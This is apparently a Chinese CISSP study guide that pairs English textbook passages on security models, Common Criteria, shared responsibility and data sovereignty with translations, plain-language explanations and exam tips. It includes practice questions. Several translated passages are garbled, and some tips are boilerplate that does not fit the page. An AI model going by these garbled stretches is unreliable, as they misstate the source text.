分隔TCB与系统其余部分的虚拟边界 C. 防火墙所在的网络 D. 与您的计算机系统的任何连接 11. 可信计算基(TCB)是硬件、软件和控制措施的组合,它们协同工作 以形成一个可信基础,用于执行您的安全策略。 TCB概念的哪一部分在 授予所请求的访问权限之前验证对每个资源的访问? A. TCB分区 B. 可信库 C. 参考监视器 D. 安全内核 12. 安全模型为设计者提供了一种将抽象陈述映射到解决方案的方法,该方案 规定了构建硬件和软件所需的算法和数据结构。 因此,安全模型为软件设计者 提供了一个衡量其设计和实现的依据。 以下哪一项是对安全模型的最佳定义? A. 安全模型规定了组织必须遵循的策略。 B. 安全模型提供了一个实施安全策略的框架。 C. 安全模型是对计算机系统的每个部分进行技术评估,以判断其是否符合安 全标准。 D. 安全模型用于在单台主机计算机的内存中托管一个或多个操作系统, 或运行与主机操作系统不兼容的应用程序。 13. 状态机模型描述了一个无论处于何种状态都始终安全的系统。

一个安全的状态 机模型系统始终 启动到安全状态,在所有转换过程中保持安全状态,并允许子 j仅限访问资源 y 以安全的方式 符合安全策略。 哪些安全模型基于状态机模型? A. Bell‑LaPadula 和 take‑grant

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

抽象:抽象把复杂细节藏在接口后,只暴露必要功能。

政策:政策是高层原则,说明必须遵守什么。

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

对象、角色、组、接口都可能体现 abstraction。

Policy 高层、强制、稳定;Procedure 具体步骤。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
抽象 抽象把复杂细节藏在接口后,只暴露必要功能。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
防火墙 防火墙根据规则控制网络流量进出。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
学习单元 55 / PDF P541

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

B. Biba and Clark–Wilson C. Clark–Wilson and Bell–LaPadula D. Bell–LaPadula and Biba 14. You are tasked with designing the core security concept for a new government computing system. The details of its use are classified, but it will need to protect confidentiality across multiple classification levels. Which security model addresses data confidentiality in this context? A. Bell–LaPadula B. Biba C. Clark–Wilson D. Brewer and Nash 15. The Bell–LaPadula multilevel security model was derived from the DoD's multilevel security policies. The multilevel security policy states that a subject with any level of clearance can access resources at or below its clearance level.

Which Bell–LaPadula property keeps lower-level subjects from accessing objects with a higher security level? A. (Star) security property B. No write-up property C. No read-up property D. No read-down property 16. The Biba model was designed after the Bell–LaPadula model. Whereas the Bell–LaPadula model addresses confidentiality, the Biba model addresses integrity. The Biba model is also built on a state machine concept, is based on information flow, and is a multilevel model. What is the implied meaning of the simple property of Biba? A. Write-down B. Read-up C. No write-up D. No read-down 17.

The Common Criteria defines various levels of testing and confirmation of systems' security capabilities. What part of the Common Criteria B. Biba

中文直译 / 整理

和 Clark–Wilson C. Clark–Wilson 和 Bell–LaPadula D. Bell–LaPadula 和 Biba 14. 您被要求为一个新的 ggovernment com puting sy系统设计核心安全概念。 其使用细节属于机密 , 但它 需要在多个密级之间保护机密性。 在此背景下,哪个安全模型涉及数据机密性? A. Bell–LaPadula B. Biba C. Clark–Wilson D. Brewer and Nash 15. Bell–LaPadula 多级安全模型源自美国国防部的多级安全策略。 多级安全 策略规定,具有任何安全级别的主体只能访问其安全级别或更低级别的资源。 哪个 Bell–LaPadula 属性防止低级别主体访问安全级别更高的对象? A. (星)安全属性 B. 不可上写属性 C. 不可上读属性 D. 不可下读属性 16. Biba 模型是在 Bell–LaPadula 模型之后设计的。 Bell–LaPadula 模型关 注机密性,而 Biba 模型关注完整性。 Biba 模型同样基于状态机概念,基于 信息流,并且是一个多级模型。

Biba 的简单属性的隐含意义是什么? A. 下写 B. 阅读材料 C. 无撰写材料 D. 无向下阅读 17. 共同准则定义了多种对系统安全能力的测试和确认级别。 共同准则的哪一部 分

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

政策:政策是高层原则,说明必须遵守什么。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

Policy 高层、强制、稳定;Procedure 具体步骤。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
政策 政策是高层原则,说明必须遵守什么。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
学习单元 56 / PDF P542

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

specifies the claims of security from the vendor that are built into a target of evaluation? A. Protection profiles B. Evaluation assurance levels C. Authorizing official D. Security target 18. The authorizing official (AO) has the discretion to determine which breaches or security changes result in a loss of the authorization to operate (ATO). The AO can also issue four types of authorization decisions. Which of the following are examples of these ATOs? (Choose all that apply.) A. Common control authorization B. Mutual authorization C. Denial of authorization D. Authorization to transfer E. Authorization to use F. Verified authorization 19.

A new operating system update has made significant changes to the prior system. While testing, you discover that the system is highly unstable, allows for integrity violations between applications, can be affected easily by local denial-of-service attacks, and allows for information disclosure between processes. You suspect that a key security mechanism has been deactivated or broken by the update. What is a likely cause of these problems? A. Use of virtualization B. Lack of memory protections C. Not following the Clark–Wilson model D. Support for storage and transmission encryption 20.

As an application designer, you need to implement various security mechanisms to protect the data that will be accessed and processed by your software. What would be the purpose of implementing a constrained or restricted interface?

中文直译 / 整理

规定了供应商在评估目标中内置的安全声明? A. 保护配置文件 B. 评估保证级别 C. 授权官员 D. 安全目标 18. 授权官员(AO)有权自行决定哪些违规行为或安全变更会导致运营授权 (ATO)失效。 AO 还可以做出四种类型的授权决定。 以下哪些是这些 ATO 的示例? (选择所有适用项。 ) A. 共同控制授权 B. 相互授权 C. 拒绝授权 D. 转移授权 E. 使用授权 F. 已验证授权 19. 一个新的操作系统更新对先前的系统进行了重大更改。 在测试过程中,您 发现系统极不稳定,允许应用程序之间出现完整性违规,且极易受到影响 通过本地拒绝服务攻击,并允许在 p程之间进行信息泄露。 您怀疑 p认为一个密 y 安全机制 y 已被更新停用或破坏。 这些 问题的可能原因是什么 问题? A. 虚拟化的使用 B. 缺乏内存保护 C. 未遵循Clark–Wilson模型 D. 支持存储和传输加密 20. 作为应用程序设计者,您需要实施各种安全机制来保护您的软件将访问 和处理的数据。 实施受限或受限接口的目的是什么?

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

程序:程序是一步一步怎么做。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Step-by-step、SOP 常对应 procedure。

RPO 问数据:最多丢到哪个时间点。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
程序 程序是一步一步怎么做。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 57 / PDF P543

第 543 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

A. To limit the actions of authorized and unauthorized users B. To enforce identity verification C. To track user events and check for violations D. To swap datasets between primary and secondary memory A.

中文直译 / 整理

限制授权和非授权用户的操作 B. 强制身份验证 C. 跟踪用户事件并检查违规行为 D. 在主内存和辅助内存之间交换数据集

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 543 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
身份 身份是主体在系统中的标识。
第 9 章 · P544-655 · 112 个学习单元

安全漏洞、威胁和对策

OSG10 · Chapter 9 · Security Vulnerabilities, Threats, and Countermeasures · 全文覆盖 + 小白精读 + 画报

第 9 章:安全漏洞、威胁和对策

这不是提炼版。本页按 PDF 第 544-655 页连续覆盖第 9 章内容,每个学习单元都包含教材原文段落、PDF 中文直译/整理、小白解释、考点提醒和对应画报。

112个连续学习单元
4格原文 / 直译 / 解释 / 考点
112页覆盖第9章正文与章末练习
小白先讲人话,再做题
学习单元 01 / PDF P544

本章考试范围总览

先知道本章会覆盖哪些考试目标,后面每个概念才知道放在哪个知识域。

教材原文段落

Chapter 9 Security Vulnerabilities, Threats, and Countermeasures THE CISSP TOPICS COVERED IN THIS CHAPTER INCLUDE: Domain 3.0: Security Architecture and Engineering 3.1 Research, implement and manage engineering processes using secure design principles 3.1.10 Shared responsibility 3.5 Assess and mitigate the vulnerabilities of security architectures, designs, and solution elements 3.5.1 Client-based systems 3.5.2 Server-based systems 3.5.5 Industrial control systems (ICS) 3.5.7 Distributed systems 3.5.8 Internet of Things (IoT) 3.5.9 Microservices (e.g., application programming interface (API)) 3.5.10 Containerization 3.5.12 Embedded systems 3.5.13 High-Performance Computing systems 3.5.14 Edge computing systems 3.5.15 Virtualized systems Security professionals must pay careful attention to the IT system and ensure that their higher-level protective controls are not built on a shaky foundation.

After all, the most secure firewall configuration in the world won't do much

中文直译 / 整理

第9章 安全漏洞、威胁与 应对措施 本章涵盖的CISSP主题包括: 领域3.0:安全架构与工程 3.1 使用安全设计原则研究、实施和管理工程流程 3.1.10 共同责任 3.5 评估并缓解安全架构、设计和解决方案元素的漏洞 3.5.1 基于客户端的系统 3.5.2 基于服务器的系统 3.5.5 工业控制系统(ICS) 3.5.7 分布式系统 3.5.8 物联网(IoT) 3.5.9 微服务(例如:应用程序编程接口(API)) 3.5.10 容器化 3.5.12 嵌入式系统 3.5.13 高性能计算系统 3.5.14 边缘计算系统 3.5.15 虚拟化系统 安全专业人员必须密切关注IT系统,并确保其高级保护控制措施不是建立在脆 弱的基础之上。 毕竟,世界上最安全的防火墙配置也无济于事

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:先知道本章会覆盖哪些考试目标,后面每个概念才知道放在哪个知识域。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

程序:程序是一步一步怎么做。

防火墙:防火墙根据规则控制网络流量进出。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“本章考试范围总览”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
程序 程序是一步一步怎么做。
防火墙 防火墙根据规则控制网络流量进出。
学习单元 02 / PDF P545

安全治理:定方向、定责任、定监督

治理负责让安全和组织目标对齐,并形成可监督的体系。

教材原文段落

good if the underlying system has a fundamental security flaw that allows malicious individuals to bypass the firewall altogether. In this chapter, we'll cover those underlying security concerns by surveying a field known as computer architecture: the physical design of computers from various components. The Security Architecture and Engineering domain addresses various concerns and issues, including secure design elements, security architecture, vulnerabilities, threats, and associated countermeasures.

Additional elements of this domain are discussed in various chapters: Chapter 1, “Security Governance Through Principles and Policies” Chapter 6, “Cryptography and Symmetric Key Algorithms” Chapter 7, “PKI and Cryptographic Applications” Chapter 8, “Principles of Security Models, Design, and Capabilities” Chapter 9, “Security Vulnerabilities, Threats, and Countermeasures” Chapter 10, “Physical Security Requirements” Chapter 14, “Controlling and Monitoring Access” Chapter 16, “Managing Security Operations” Chapter 20, "Software Development Security" Chapter 21, “Malicious Code and Application Attacks” Please be sure to review all of these chapters to have a complete perspective on the topics of this domain.

Shared Responsibility Shared responsibility is the security design principle that indicates that organizations do not operate in isolation. Instead, they are intertwined with the world in numerous ways. We all use the same basic technology, we follow the same communication protocol specifications, we use the same Internet, we use common foundations of operating systems and programming languages, and most of our IT/IS is implemented using off-the-shelf solutions (whether commercial or open source). Thus, we are automatically integrated with the rest of the world and share the responsibility of establishing and maintaining security.

中文直译 / 整理

如果底层系统存在根本性的安全漏洞,使恶意人员能够完全绕过防火墙的话。 在本章中,我们将通过考察一个称为计算机体系结构的领域来探讨这些底层安 全问题:即由各种组件构成的计算机的物理设计。 安全架构与工程领域涵盖各种问题和关切,包括安全设计元素、安全架构、漏 洞、威胁及相关对策。 本领域的其他内容将在以下各章中讨论: 第1章,“通过原则与政策实现安全治理” 第6章,“密码学与对称密钥算法” 第7章,“PKI与密码学应用” 第8章,“安全模型、设计与能力的原则” 第9章,“安全漏洞、威胁与应对措施” 第10章,“物理安全要求” 第14章,“访问控制与监控” 第16章,“安全管理操作” 第20章,“软件开发安全” 第21章,“恶意代码与应用攻击” 请务必阅读所有这些章节,以全面了解本领域的主题。 共同责任 共同责任是安全设计原则,表明组织并非孤立运作。 相反,它们以多种方式与 世界紧密相连。 我们使用相同的基础技术,遵循相同的通信协议规范,使用相 同的互联网,采用共同的操作系统和编程语言基础,且我们的大多数IT/IS都是 使用现成解决方案(无论是商业的还是开源的)实现的。

因此,我们自动与世 界其他部分集成,并共同承担建立和维护安全的责任。

小白解释

场景先行:公司准备上线一个新业务系统,技术团队说可以买设备,法务说要合规,业务说不能影响上线。安全治理就是让高层定方向:安全要服务业务目标,风险由谁接受,预算花在哪里。

这一页真正想让你理解的是:治理负责让安全和组织目标对齐,并形成可监督的体系。

把它放进公司里看,关键不是背定义,而是判断:如果没有治理,安全会变成各部门各做各的:有人只想省钱,有人只想堆工具,最后责任不清。

你作为负责人可以这样想:先定策略和责任,再把战略拆成战术计划和日常运营计划。

本页术语用人话说:

安全治理:治理负责定方向、定责任、定监督方式。它不是配置防火墙,而是决定组织为什么要做安全、由谁负责、做到什么程度。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

政策:政策是高层原则,说明必须遵守什么。

密码学:密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。

常见误区:不要把治理理解成配置设备;治理是方向、责任和监督。

读完后用一句话复述:如果我是高层管理者 / CISO,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全治理:定方向、定责任、定监督”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是高层管理者 / CISO在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 governance,优先想高层责任、业务目标、策略、监督和持续改进。

ISO 偏标准和管理体系。

Policy 高层、强制、稳定;Procedure 具体步骤。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

同一密钥、速度快、大数据加密常对应 symmetric。

排除法提醒:不要把治理理解成配置设备;治理是方向、责任和监督。

本页术语拆解
安全治理 治理负责定方向、定责任、定监督方式。它不是配置防火墙,而是决定组织为什么要做安全、由谁负责、做到什么程度。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
政策 政策是高层原则,说明必须遵守什么。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
公钥基础设施 PKI PKI 用证书、CA、注册、吊销等机制管理公钥信任。
防火墙 防火墙根据规则控制网络流量进出。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 03 / PDF P546

角色与职责:谁最终负责,谁执行保护

CISSP 很爱考 owner、custodian、senior manager 的责任边界。

教材原文段落

We must realize this shared responsibility and take our role in this situation seriously. Here are several aspects of this concept to ponder: Everyone in an organization has some level of security responsibility. It is the job of the CISO and security team to establish security and maintain it. It is the job of the regular employees to perform their tasks within the confines of security. It is the job of the auditor to monitor the environment for violations. Organizations are responsible to their stakeholders to make good security decisions to sustain the organization. Otherwise, the needs of the stakeholders may be violated.

When working with third parties, especially with cloud providers, each entity needs to understand their portion of the shared responsibility of performing work operations and maintaining security. This is often referenced as the cloud-shared responsibility model, which is discussed further in Chapter 16. As we become aware of new vulnerabilities and threats, we should consider it our responsibility (if not our duty) to responsibly disclose that information to the proper vendor or to an information sharing center (also known as a threat intelligence source or service).

中文直译 / 整理

我们必须认识到这种共同责任,并认真对待我们在这一情况中的角色。 以下是这 一概念的几个方面供您思考: 组织中的每个人都有一定程度的安全责任。 CISO和安全团队的职责是建 立并维护安全。 普通员工的职责是在安全框架内执行其任务。 审计员的职 责是监控环境中的违规行为。 组织有责任为其利益相关者做出良好的安全决策,以维持组织的运行。 否则,利益相关者的需求可能会受到损害。 与第三方合作时,尤其是与云服务提供商合作时,每个实体都需要理解 其在执行工作操作和维护安全方面的共同责任。 这通常被称为云共享责 任模型,将在第16章中进一步讨论。 当我们发现新的漏洞和威胁时,我们有责任(如果不是义务的话)将这些 信息负责任地披露给相应的厂商或信息共享中心(也称为威胁情报源或服 务)。

小白解释

场景先行:公司准备上线一个新业务系统,技术团队说可以买设备,法务说要合规,业务说不能影响上线。安全治理就是让高层定方向:安全要服务业务目标,风险由谁接受,预算花在哪里。

这一页真正想让你理解的是:CISSP 很爱考 owner、custodian、senior manager 的责任边界。

把它放进公司里看,关键不是背定义,而是判断:如果没有治理,安全会变成各部门各做各的:有人只想省钱,有人只想堆工具,最后责任不清。

你作为负责人可以这样想:先定策略和责任,再把战略拆成战术计划和日常运营计划。

本页术语用人话说:

审计:审计记录主体行为,用于追责、复盘和取证。

首席信息安全官:CISO 负责组织安全计划、策略、沟通和监督。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

审计:审计检查控制是否存在、是否有效、是否符合要求。

常见误区:不要把治理理解成配置设备;治理是方向、责任和监督。

读完后用一句话复述:如果我是高层管理者 / CISO,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“角色与职责:谁最终负责,谁执行保护”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是高层管理者 / CISO在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

没有日志和身份绑定,就很难问责。

CISO 需要足够独立性和高层支持。

ISO 偏标准和管理体系。

审计题关注独立性、证据、范围和报告。

排除法提醒:不要把治理理解成配置设备;治理是方向、责任和监督。

本页术语拆解
审计 审计记录主体行为,用于追责、复盘和取证。
首席信息安全官 CISO 负责组织安全计划、策略、沟通和监督。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
审计 审计检查控制是否存在、是否有效、是否符合要求。
学习单元 04 / PDF P547

第 547 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Automated indicator sharing (AIS) is an initiative by the Department of Homeland Security (DHS) to facilitate the open and free exchange of indicators of compromise (IoCs) and other cyberthreat information between the U.S. federal government and the private sector in an automated and timely manner (described as “machine speed”). An indicator is an observable along with a hypothesis about a threat. An observable is an identified fact of occurrence, such as the presence of a malicious file, usually accompanied by a hash. AIS uses Structured Threat Information eXpression (STIX) and Trusted Automated eXchange of Intelligence Information (TAXII) to share threat indicators.

STIX is a standardized language expressing structured information about cyberthreats and a common framework for organizations to share and analyze threat intelligence. TAXII defines protocols and services for automated sharing of structured threat information. AIS is managed by the National Cybersecurity and Communications Integration Center (NCCIC). For more information on the AIS program, please visit us-cert.gov/ais. Because we participate in shared responsibility, we must research, implement, and manage engineering processes using secure design principles.

Data Localization and Data Sovereignty Data localization refers to storing and processing data within a specific country or region's physical borders or geographical boundaries. This concept is often driven by regulatory requirements or government policies that mandate certain data, especially sensitive or personal information, to be kept within the jurisdiction's borders where it was generated or where the data subject resides. Data localization aims to exert greater control over data privacy, security, and compliance with local laws.

It can involve restrictions on cross-border data transfer and may influence how businesses structure their data storage and processing infrastructure to adhere to these regulations.

中文直译 / 整理

自动化指标共享(AIS)是美国国土安全部(DHS)的一项倡议,旨 在以自动化和及时的方式(称为“机器速度”)促进美国联邦政府与私营 部门之间关于攻击指标(IoCs)和其他网络威胁信息的开放和免费交换。 指标是可观察到的现象及其关于威胁的假设。 可观察到的现象是已识别出 的发生事实,例如恶意文件的存在,通常附带一个哈希值。 AIS 使用 Structured Threat Information eXpression (STIX) 和 Trusted Automated eXchange of Intelligence Information (TAXII) 共享威胁指标。 STIX 是一种用于表达网络威胁结构化信息的标准化语言,也是组织共享和 分析威胁情报的通用框架。 TAXII 定义了自动化共享结构化威胁信息的协 议和服务。 AIS 由国家网络安全和通信集成中心(NCCIC)管理。 有关 AIS 计划的 更多信息,请访问us-cert.gov/ais。 由于我们参与共同责任,因此必须使用安全设计原则研究、实施和 管理工程流程。 数据本地化与数据主权 数据本地化是指在特定国家或地区的物理边界或地理范围内存储和处理数据。

这一概念通常由监管要求或政府政策驱动,这些要求或政策强制规定某些数据, 尤其是敏感或个人信息,必须保留在数据生成地或数据主体居住地的司法管辖 区范围内。 数据本地化旨在加强对数据隐私、安全以及遵守当地法律的控制。 它可能涉及对跨境数据传输的限制,并可能影响企业如何构建其数据存储和处 理基础设施以遵守这些法规。

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

政策:政策是高层原则,说明必须遵守什么。

标准:标准给出必须满足的最低要求。

哈希:哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 547 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Policy 高层、强制、稳定;Procedure 具体步骤。

Minimum level、mandatory requirement 常对应 standard。

哈希本身不提供机密性;它主要用于完整性校验。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
学习单元 05 / PDF P548

第 548 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Data sovereignty refers to the concept that digital data is subject to the laws and regulations of the country or region in which it is located or originates. It emphasizes that governments have authority over the data collected within their jurisdiction, and organizations must comply with local data protection and privacy laws. Data sovereignty is closely related to concerns about privacy, security, and compliance, and it often influences decisions regarding where data is stored, processed, and managed to align with legal and regulatory requirements in a given geographical area.

While data localization and data sovereignty are related concepts, they have distinct focuses and implications: Focus: Data localization: Primarily centers on the physical location of data storage and processing. It mandates that certain types of data, especially sensitive or personal information, must be kept within specific geographical borders. Data sovereignty: Encompasses a broader set of principles related to the authority and control that a country or region asserts over the data generated within its jurisdiction. This includes where the data is stored and concerns about legal jurisdiction and compliance with local data protection laws.

Scope: Data localization: Primarily addresses the geographical aspect of data storage and processing. It often involves regulations specifying that data should reside on servers physically located within the borders of a specific country or region. Data sovereignty: Encompasses a broader range of concerns, including legal jurisdiction, regulatory compliance, and the overarching authority that a government has over data collected within its boundaries. It extends beyond mere storage location to include control and governance aspects. Drivers: Data localization: Often driven by specific regulations or laws that mandate the physical presence of data within a particular jurisdiction.

This can be motivated by data privacy, security, or economic concerns.

中文直译 / 整理

